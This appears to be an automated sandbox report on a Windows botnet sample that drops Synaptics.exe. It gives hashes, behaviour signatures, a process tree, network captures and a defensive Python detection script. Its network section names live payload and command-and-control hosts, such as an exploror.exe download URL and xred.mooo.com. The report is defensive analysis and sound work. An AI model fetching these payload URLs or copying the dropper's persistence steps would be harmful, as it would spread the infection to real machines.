Analysis

  • max time kernel
    161s
  • max time network
    178s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20220812-en
  • resource tags

    arch:x64, arch:x86, image:win10v2004-20220812-en, locale:en-us, os:windows10-2004-x64, system
  • submitted
    16/01/2023, 08:32 UTC

General

  • Target   1d0e642944902e1e597158a6029e56ccc7fd2877ec27aec420ff81b20c1fd180.exe
  • Size     362KB
  • MD5      99be0e637186d469b647525e9275ccfc
  • SHA1     83a797037fd4c10f1248387395cc039aa9f3c71b
  • SHA256   1d0e642944902e1e597158a6029e56ccc7fd2877ec27aec420ff81b20c1fd180
  • SHA512   1477f8db399c74174379ff881f6dcd9148bf57ff29839c466259d4c17235254e66cfd0410e5d0d79304a1a4f8352910d64a4f1446f7ed9cd5ceccd285ed265d5
  • SSDEEP   3072:N8jSZi34eTzl5KV2GenT0cTtm2LAQSXVqjzpYfJhrI:quZ5eg2GenQ67wk3pyJhrI

Malware Config

Signatures

  • Generic Chinese Botnet
    A botnet originating from China which is currently unnamed publicly.
  • Chinese Botnet payload (2 IoCs)
  • Downloads MZ/PE file
  • Executes dropped EXE (3 IoCs)
  • Checks computer location settings (2 TTPs, 2 IoCs)
    Looks up the country code configured in the registry, likely for geofencing.
  • Adds Run key to start application (2 TTPs, 3 IoCs)
  • Enumerates connected drives (3 TTPs, 23 IoCs)
    Attempts to read the root path of hard drives other than the default C: drive.
  • Enumerates physical storage devices (1 TTP)
    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
  • Checks processor information in registry (2 TTPs, 2 IoCs)
    Processor information is often read in order to detect sandboxing environments.
  • Modifies registry class (1 IoC)
  • Suspicious behavior: EnumeratesProcesses (2 IoCs)
  • Suspicious use of WriteProcessMemory (12 IoCs)

Processes

  • C:\Users\Admin\AppData\Local\Temp\1d0e642944902e1e597158a6029e56ccc7fd2877ec27aec420ff81b20c1fd180.exe (PID 4844)
    Command line: "C:\Users\Admin\AppData\Local\Temp\1d0e642944902e1e597158a6029e56ccc7fd2877ec27aec420ff81b20c1fd180.exe"
    Signatures: Checks computer location settings; Adds Run key to start application; Suspicious use of WriteProcessMemory
    • C:\Windows\SysWOW64\cmd.exe (PID 4644, child of 4844)
      Command line: C:\Windows\system32\cmd.exe /c md C:\windowss64
      Note: the parent asked for system32\cmd.exe but the process that ran is SysWOW64\cmd.exe; that is WoW64 file-system redirection for a 32-bit caller, so path-based rules for cmd.exe should match both directories.
    • C:\windowss64\computer.exe (PID 5008, child of 4844)
      Command line: "C:\windowss64\computer.exe"
      Signatures: Executes dropped EXE; Checks computer location settings; Adds Run key to start application; Modifies registry class; Suspicious use of WriteProcessMemory
      • C:\Users\Admin\AppData\Local\Temp\._cache_computer.exe (PID 1532, child of 5008)
        Command line: "C:\Users\Admin\AppData\Local\Temp\._cache_computer.exe"
        Signatures: Executes dropped EXE; Adds Run key to start application; Enumerates connected drives; Checks processor information in registry; Suspicious behavior: EnumeratesProcesses
      • C:\ProgramData\Synaptics\Synaptics.exe (PID 3208, child of 5008)
        Command line: "C:\ProgramData\Synaptics\Synaptics.exe" InjUpdate
        Signatures: Executes dropped EXE
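The process chain above, from the Temp-resident sample through cmd.exe creating C:\windowss64 to computer.exe, ._cache_computer.exe and Synaptics.exe InjUpdate, can be expressed as process-creation detection rules. The block below is an added example written for this page; it is not part of the sandbox report and not code from any vendor. The event records are constructed to mirror the tree above using the report's PIDs (sample.exe stands in for the long SHA256 file name, explorer.exe with PID 1000 is an assumed parent, and a benign cmd.exe is added as a control), the field names are an assumed Sysmon-like schema, and the first two rules generalise beyond this sample: any Temp-resident process that uses cmd.exe to create a directory directly under a drive root, and any executable run from a directory under the drive root that is not one of the standard ones.

```python
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class ProcEvent:
    """One process-creation record (assumed Sysmon-like fields, not a vendor schema)."""
    pid: int
    ppid: int
    image: str    # full path of the new process
    cmdline: str  # command line as logged


# "sample.exe" stands in for the submitted file (its real name is the SHA256 in the report).
SAMPLE = r"C:\Users\Admin\AppData\Local\Temp\sample.exe"

# Constructed events mirroring the tree in the report; PIDs are the report's, the
# explorer.exe parent (PID 1000) and the final benign cmd.exe are assumptions.
SAMPLE_EVENTS = [
    ProcEvent(1000, 4, r"C:\Windows\explorer.exe", "explorer.exe"),
    ProcEvent(4844, 1000, SAMPLE, f'"{SAMPLE}"'),
    ProcEvent(4644, 4844, r"C:\Windows\SysWOW64\cmd.exe",
              r"C:\Windows\system32\cmd.exe /c md C:\windowss64"),
    ProcEvent(5008, 4844, r"C:\windowss64\computer.exe", r'"C:\windowss64\computer.exe"'),
    ProcEvent(1532, 5008, r"C:\Users\Admin\AppData\Local\Temp\._cache_computer.exe",
              r'"C:\Users\Admin\AppData\Local\Temp\._cache_computer.exe"'),
    ProcEvent(3208, 5008, r"C:\ProgramData\Synaptics\Synaptics.exe",
              r'"C:\ProgramData\Synaptics\Synaptics.exe" InjUpdate'),
    ProcEvent(7000, 1000, r"C:\Windows\System32\cmd.exe", r'"C:\Windows\System32\cmd.exe"'),
]

# Directories that legitimately sit directly under a drive root.
KNOWN_ROOT_DIRS = {"windows", "program files", "program files (x86)", "programdata",
                   "users", "perflogs", "$recycle.bin", "system volume information"}
TEMP_RE = re.compile(r"\\appdata\\local\\temp\\", re.I)
# cmd.exe /c md <drive>:\<one component>  (either spelling of md, any cmd.exe location)
MKDIR_RE = re.compile(r'\bcmd(?:\.exe)?\b.*\s/c\s+(?:md|mkdir)\s+([a-z]:\\[^\\\s"]+)\s*$', re.I)


def top_level_dir(path):
    """Return the directory directly under the drive root, lower-cased, or None."""
    m = re.match(r"^[a-z]:\\([^\\]+)\\", path, re.I)
    return m.group(1).lower() if m else None


def detect(events):
    """Return (rule, pid, detail) hits for the behaviours seen in the report's tree."""
    by_pid = {e.pid: e for e in events}
    hits = []
    for e in events:
        parent = by_pid.get(e.ppid)
        name = e.image.rsplit("\\", 1)[-1].lower()
        # R1: a process living in the user's Temp folder spawns cmd.exe to create a
        # directory directly under the drive root (report: cmd.exe /c md C:\windowss64).
        m = MKDIR_RE.search(e.cmdline)
        if m and parent is not None and TEMP_RE.search(parent.image):
            hits.append(("temp_process_mkdir_at_root", e.pid, m.group(1)))
        # R2: executable launched from a non-standard directory under the drive root.
        d = top_level_dir(e.image)
        if d is not None and d not in KNOWN_ROOT_DIRS:
            hits.append(("exec_from_nonstandard_root_dir", e.pid, e.image))
        # R3: the "._cache_<name>.exe" drop in Temp, as in the report.
        if name.startswith("._cache_") and TEMP_RE.search(e.image):
            hits.append(("cache_prefixed_exe_in_temp", e.pid, e.image))
        # R4: ProgramData\Synaptics\Synaptics.exe started with the InjUpdate argument.
        if e.image.lower().endswith(r"\programdata\synaptics\synaptics.exe") \
                and "injupdate" in e.cmdline.lower():
            hits.append(("synaptics_injupdate", e.pid, e.cmdline))
    return hits


if __name__ == "__main__":
    for rule, pid, detail in detect(SAMPLE_EVENTS):
        print(f"{rule:32} pid={pid} {detail}")
```

Because the parent requested system32\cmd.exe and WoW64 redirection produced SysWOW64\cmd.exe, the mkdir rule keys on the command line and the parent's location rather than on the cmd.exe image path; a rule that only matches \System32\cmd.exe would miss this chain.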

    Network

    • GET
      http://47.93.60.63:8000/exploror.exe
      1d0e642944902e1e597158a6029e56ccc7fd2877ec27aec420ff81b20c1fd180.exe
      Remote address:
      47.93.60.63:8000
      Request
      GET /exploror.exe HTTP/1.1
      Accept: */*
      Accept-Encoding: gzip, deflate
      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
      Host: 47.93.60.63:8000
      Connection: Keep-Alive
      Response
      HTTP/1.1 200 OK
      Content-Type: application/octet-stream
      Content-Length: 1181696
      Accept-Ranges: bytes
      Server: HFS 2.3i
      Set-Cookie: HFS_SID_=0.888800468761474; path=/; HttpOnly
      Last-Modified: Thu, 03 Nov 2022 07:49:44 GMT
      Content-Disposition: attachment; filename="exploror.exe";
    • DNS
      164.2.77.40.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      164.2.77.40.in-addr.arpa
      IN PTR
      Response
    • DNS
      xred.mooo.com
      Synaptics.exe
      Remote address:
      8.8.8.8:53
      Request
      xred.mooo.com
      IN A
      Response
    • DNS
      freedns.afraid.org
      Synaptics.exe
      Remote address:
      8.8.8.8:53
      Request
      freedns.afraid.org
      IN A
      Response
      freedns.afraid.org
      IN A
      69.42.215.252
    • GET
      http://freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978
      Synaptics.exe
      Remote address:
      69.42.215.252:80
      Request
      GET /api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978 HTTP/1.1
      User-Agent: MyApp
      Host: freedns.afraid.org
      Cache-Control: no-cache
      Response
      HTTP/1.1 200 OK
      Server: nginx
      Date: Mon, 16 Jan 2023 08:34:33 GMT
      Content-Type: text/html; charset=UTF-8
      Transfer-Encoding: chunked
      Connection: keep-alive
      Vary: Accept-Encoding
      X-Cache: MISS
    • DNS
      xred.mooo.com
      Synaptics.exe
      Remote address:
      8.8.8.8:53
      Request
      xred.mooo.com
      IN A
      Response
    • DNS
      docs.google.com
      Synaptics.exe
      Remote address:
      8.8.8.8:53
      Request
      docs.google.com
      IN A
      Response
      docs.google.com
      IN A
      142.250.179.174
    • GET
      https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
      Synaptics.exe
      Remote address:
      142.250.179.174:443
      Request
      GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
      User-Agent: Synaptics.exe
      Host: docs.google.com
      Cache-Control: no-cache
      Response
      HTTP/1.1 404 Not Found
      Content-Type: text/html; charset=utf-8
      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
      Pragma: no-cache
      Expires: Mon, 01 Jan 1990 00:00:00 GMT
      Date: Mon, 16 Jan 2023 08:35:56 GMT
      Strict-Transport-Security: max-age=31536000
      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
      Content-Security-Policy: script-src 'report-sample' 'nonce-Yj0LQAF4eiOfGvfClVnOlw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-platform=*, ch-ua-platform-version=*
      Cross-Origin-Opener-Policy: same-origin
      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
      Server: ESF
      X-XSS-Protection: 0
      X-Content-Type-Options: nosniff
      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
      Accept-Ranges: none
      Vary: Accept-Encoding
      Transfer-Encoding: chunked
    • GET
      https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
      Synaptics.exe
      Remote address:
      142.250.179.174:443
      Request
      GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
      User-Agent: Synaptics.exe
      Host: docs.google.com
      Cache-Control: no-cache
      Response
      HTTP/1.1 404 Not Found
      Content-Type: text/html; charset=utf-8
      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
      Pragma: no-cache
      Expires: Mon, 01 Jan 1990 00:00:00 GMT
      Date: Mon, 16 Jan 2023 08:35:56 GMT
      Strict-Transport-Security: max-age=31536000
      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-platform=*, ch-ua-platform-version=*
      Cross-Origin-Opener-Policy: same-origin
      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
      Content-Security-Policy: script-src 'report-sample' 'nonce-lHhuxh-tbU6C648SFvIIlA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
      Server: ESF
      X-XSS-Protection: 0
      X-Content-Type-Options: nosniff
      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
      Accept-Ranges: none
      Vary: Accept-Encoding
      Transfer-Encoding: chunked
    Connections. Each entry gives remote address | protocol | process | bytes sent / received | packets sent / received; where only one byte and packet count is shown nothing was received on that connection. sample.exe below denotes the submitted file, 1d0e642944902e1e597158a6029e56ccc7fd2877ec27aec420ff81b20c1fd180.exe.

    • 93.184.220.29:80 | 46 B / 40 B | 1 / 1
    • 93.184.220.29:80 | 40 B | 1
    • 93.184.220.29:80 | 46 B / 40 B | 1 / 1
    • 20.23.71.251:443 | tls | 138 B / 183 B | 3 / 3
    • 20.23.71.251:443 | tls | 138 B / 183 B | 3 / 3
    • 47.93.60.63:8000 | http | sample.exe | 72.9 kB / 1.2 MB | 1521 / 1517
      GET http://47.93.60.63:8000/exploror.exe → 200
    • 93.184.220.29:80 | 322 B | 7
    • 93.184.221.240:80 | 322 B | 7
    • 20.189.173.13:443 | 322 B | 7
    • 87.248.202.1:80 | 322 B | 7
    • 87.248.202.1:80 | 322 B | 7
    • 87.248.202.1:80 | 322 B | 7
    • 93.184.220.29:80 | 260 B | 5
    • 106.52.15.123:80 | sample.exe | 260 B | 5
    • 106.52.15.123:80 | ._cache_computer.exe | 260 B | 5
    • 69.42.215.252:80 | http | Synaptics.exe | 430 B / 455 B | 6 / 5
      GET http://freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978 → 200
    • 193.218.201.186:8000 | sample.exe | 260 B | 5
    • 47.93.60.63:80 | ._cache_computer.exe | 260 B | 5
    • 193.218.201.186:8000 | sample.exe | 260 B | 5
    • 47.93.60.63:80 | http | ._cache_computer.exe | 920 B / 256 B | 7 / 6
    • 193.218.201.186:8000 | sample.exe | 260 B | 5
    • 142.250.179.174:443 (docs.google.com) | Synaptics.exe | 260 B | 5
    • 193.218.201.186:8000 | sample.exe | 260 B | 5
    • 142.250.179.174:443 (docs.google.com) | tls | Synaptics.exe | 412 B / 172 B | 5 / 4
    • 142.250.179.174:443 (docs.google.com) | tls, http | Synaptics.exe | 1.5 kB / 13.8 kB | 20 / 18
      GET https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download → 404
      GET https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download → 404
    • 193.218.201.186:8000 | sample.exe | 208 B | 4
    • 8.8.8.8:53 | dns | 70 B / 144 B | 1 / 1
      DNS request: 164.2.77.40.in-addr.arpa (PTR), no answer returned
    • 8.8.8.8:53 | dns | Synaptics.exe | 59 B / 118 B | 1 / 1
      DNS request: xred.mooo.com (A), no address returned
    • 8.8.8.8:53 | dns | Synaptics.exe | 64 B / 80 B | 1 / 1
      DNS request: freedns.afraid.org (A), response 69.42.215.252
    • 224.0.0.251:5353 | 114 B | 2
    • 8.8.8.8:53 | dns | Synaptics.exe | 59 B / 118 B | 1 / 1
      DNS request: xred.mooo.com (A), no address returned
    • 8.8.8.8:53 | dns | Synaptics.exe | 61 B / 77 B | 1 / 1
      DNS request: docs.google.com (A), response 142.250.179.174

    MITRE ATT&CK Enterprise v6


    Downloads

    • C:\ProgramData\Synaptics\Synaptics.exe
      Filesize  754KB
      MD5       310a7ff41f6633132e6c2bc25e51e567
      SHA1      5f687df8cc3185ed68d77d0e05502c2eb308c5c8
      SHA256    d1425edf482717cb64db2a36357866045b0c6306d919296591ffc9bc45d680ab
      SHA512    ee9b3114cb37e52793bccdf20a27158f5def67ed9c7d8eb772e1deaf5d5f9a0030e847dea40bb320637f29508f1be2a49c3095460a6fd3afbc3bca196f642980

    • C:\Users\Admin\AppData\Local\Temp\._cache_computer.exe
      Filesize  400KB
      MD5       20beeb0a82adcce3a58372804acc46be
      SHA1      c579d9017d2c8298fe075ff5c05963901330e72a
      SHA256    d1aaa7e7d31bf648c57f0c721d6f6ee2b17395b4e09d9d89a4f6dbd5dd706a8e
      SHA512    7636912ba6323063cefb7fac5a6cff9e44a474e452a4d5d4f77ef88968266de184c68112e3667585e02e811781f51ee020e61ce820e3f9a38dcfdf30e6d522bd

    • C:\windowss64\computer.exe
      Filesize  1.1MB
      MD5       be689578752179e22bf915dbcf4f7520
      SHA1      e798e703bfb90707a2872b51da73f32af566aedb
      SHA256    de8c1aa37dd523e0699a10be71185f7a8ac1cde972d04107068f49250ef7317e
      SHA512    89c95b387e566dfaf3f6a4ab60ee6e24d2574dd3802458e4d8f15e4c44136ac54c5b3a53addc1d28748656320050ee735fa2e8e5c57cdfb53fbdddc6eb586da8

    • memory/1532-145-0x0000000010000000-0x0000000010018000-memory.dmp
      Filesize  96KB
    • memory/4844-136-0x0000000010000000-0x0000000010018000-memory.dmp
      Filesize  96KB

    Both dumps cover the same 96KB region at 0x10000000-0x10018000, once in the original sample (PID 4844) and once in ._cache_computer.exe (PID 1532).
